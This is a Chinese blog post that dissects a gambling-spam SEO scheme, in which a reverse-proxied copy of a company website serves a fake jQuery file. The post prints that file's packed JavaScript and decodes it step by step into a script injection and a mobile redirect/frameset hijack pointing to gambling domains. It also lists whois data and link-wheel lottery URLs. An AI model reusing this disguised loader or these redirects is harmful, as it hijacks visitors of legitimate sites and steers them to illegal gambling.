菠菜反向代理霸屏技术

分析关键词:众盈彩票

本次分析的是PC端排名。

此关键词PC端baidu的内容,全是主站。

下一篇文章分析二级目录,二级目录没人做这个词奥。

接着分析吧。

 

第一步,随意进入一个站

 

 

从图而知,主域名没变,网站似乎是用一个frameset框架嵌入的。

分析一下百度快照。

 

似乎是一家企业的官方网站。

正常人的反应,这官网被黑了。

我不这么认为,我试着搜索了一下这个站的关键词。

发现其官网并没有被黑,但是它是另一个域名。“http://www.mllgc.com/”

也就是说,刚才分析的网站似乎是用的反向代理技术。

替换了title等重要内容,主要把首页权重做起来。

接下来看其反向代理的代码。

首先知道其主站是一个框架,那么必然是有一段代码遮挡住了主要内容。

一般都是JS代码,然后找到了。

https://www.szlgqz.com/jquery-1.11.1.min.js

 

看起来跟jq似的藏着,其并非,内容如下。

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
eval(function(p, a, c, k, e, r) {
e = function(c) {
return c.toString(a)
};
if (!''.replace(/^/, String)) {
while (c--) r[e(c)] = k[c] || e(c);
k = [function(e) {
return r[e]
}];
e = function() {
return '\\w+'
};
c = 1
};
while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p
} ('5.b(7("%j%4%0%6%1%8%0%9%a//3.c.d/e/f/g.h.i%1%2%k/l%2 "));', 22, 22, '3D|22|3E|www|20language|document|22javascript|unescape|20src|22https|3A|write|woaichina88|com|uploads|src|pk10|201712dede|js|3Cscript|3C|script'.split('|'), 0, {}))

昂,加密了,那就解开。

至于这代码怎么解密,就不多解释了。

解密之后代码如下。

1
document.write(unescape("%3Cscript%20language%3D%22javascript%22%20src%3D%22https%3A//www.woaichina88.com/uploads/src/pk10.201712dede.js%22%3E%3C/script%3E "));

 

unescape函数,继续解码一下。

得出内容

1
<script language="javascript" src="https://www.woaichina88.com/uploads/src/pk10.201712dede.js"></script>

 

OK 继续分析这个JS的内容。

1
eval(function(p,a,c,k,e,r){e=function(c){return(c&lt;a?'':e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('Q(I(p,a,c,k,e,r){e=I(c){J(c&lt;a?\'\':e(X(c/a)))+((c=c%a)&gt;P?N.R(c+S):c.V(W))};K(!\'\'.M(/^/,N)){L(c--)r[e(c)]=k[c]||e(c);k=[I(e){J r[e]}];e=I(){J\'\\\\w+\'};c=1};L(c--)K(k[c])p=p.M(T U(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);J p}(\'h{n 9=c.e.j;5(!9.6("k")){5((l.m.6(/(p|q|r|u|v)/i))){c.e="7://8.4/a.b"}}}g(o){}1.2("");1.2("1.3(\\\"\\\");");1.2("1.3(\\\"\\\");");1.2("1.3(\\\"&lt;\\\\/f&gt;\\\");");1.2("&lt;\\\\/d&gt;");\',O,O,\'|Y|Z|10|11|K|12|13|14|15|16|17|18|19|1a|1b|1c|1d||1e|1f|1g|1h|1i|1j|1k|1l|1m|1n|1o|1p|1q|1r|1s|1t|1u|1v|1w|1x|1y|1z|1A|1B|1C\'.1D(\'|\'),0,{}))',62,102,'||||||||||||||||||||||||||||||||||||||||||||function|return|if|while|replace|String|44|35|eval|fromCharCode|29|new|RegExp|toString|36|parseInt|document|writeln|write|com|match|https|welcomeds|urlhash|dd|html|window|script|location|frameset|catch|try|hash|fromapp|navigator|userAgent|var|err|iPhone|iPod|Android|language|javascript|ios|iPad|rows|100|frameborder|NO|border|framespacing|frame|name|main|src|scrolling|yes|split'.split('|'),0,{}))

卧槽得到的代码加密方式同上。

解密后如下(解密方式搜索引擎会告诉你)

1
2
3
4
5
6
7
8
9
10
11
12
13
try {
    var urlhash = window.location.hash;
    if (!urlhash.match("fromapp")) {
        if ((navigator.userAgent.match(/(iPhone|iPod|Android|ios|iPad)/i))) {
            window.location = "https://welcomeds.com/dd.html"
        }
    }
} catch(err) {}
document.writeln("<script language = javascript>");
document.writeln("document.write("<frameset rows=\'100%,*\' frameborder=\'NO\' border=\'0\' framespacing=\'0\'>");");
document.writeln("document.write("<frame name=\'main\' src=\'https://welcomeds.com/dd.html'
/scrolling=yes>");");
document.writeln("document.write("<\/frameset>");");
document.writeln("<\/script>");

可算能看懂了,如果是移动设备,就直接重定向跳转新的url,非移动端就用作嵌入的方式去显示页面的内容。
 
获取了一下https://welcomeds.com/的内容。
返回的只有“大圣哥哥ok!”
也就理解域名的意思了。
 
代码一遍一遍的加密,应该是为了避免搜索引擎直接识别出JS的内容吧。
 
域名应该也是抢注的老域名
以下为whois信息

1
2
3
4
5
6
7
8
Domain Name: SZLGQZ.COM
Registry Domain ID: 2299364610_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namebright.com
Registrar URL: http://www.NameBright.com
Updated Date: 2018-08-19T11:16:30Z
Creation Date: 2018-08-19T11:09:12Z
Registry Expiry Date: 2019-08-19T11:09:12Z
Registrar: TurnCommerce, Inc. DBA NameBright.com

  
从其主站的html源码中又看到了如下内容
  

1
2
3
4
5
<br>
友情链接:<a href="http://gsjxjzzs.com/">正规彩票网站有哪些 </a>&nbsp;<a href="http://885592.net/">彩88彩票网</a>&nbsp;
<a href="http://365bgjj.com/">金凤凰彩票</a>&nbsp; <a href="http://shouduzi99.com/">
99彩票 </a>&nbsp;<a href="http://twitcoins.com/">幸运飞艇开奖网址</a><br>
<br>

 
看了一下这几个链接的内容,代码都和如上分析的一样。
这也就是SEO中常用的“链轮”技术了。

下一期开始写
菠菜二级目录霸屏技术

评论0

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
来了死鬼
登入/注册
卧槽~你还有脸回来
没有账号? 忘记密码?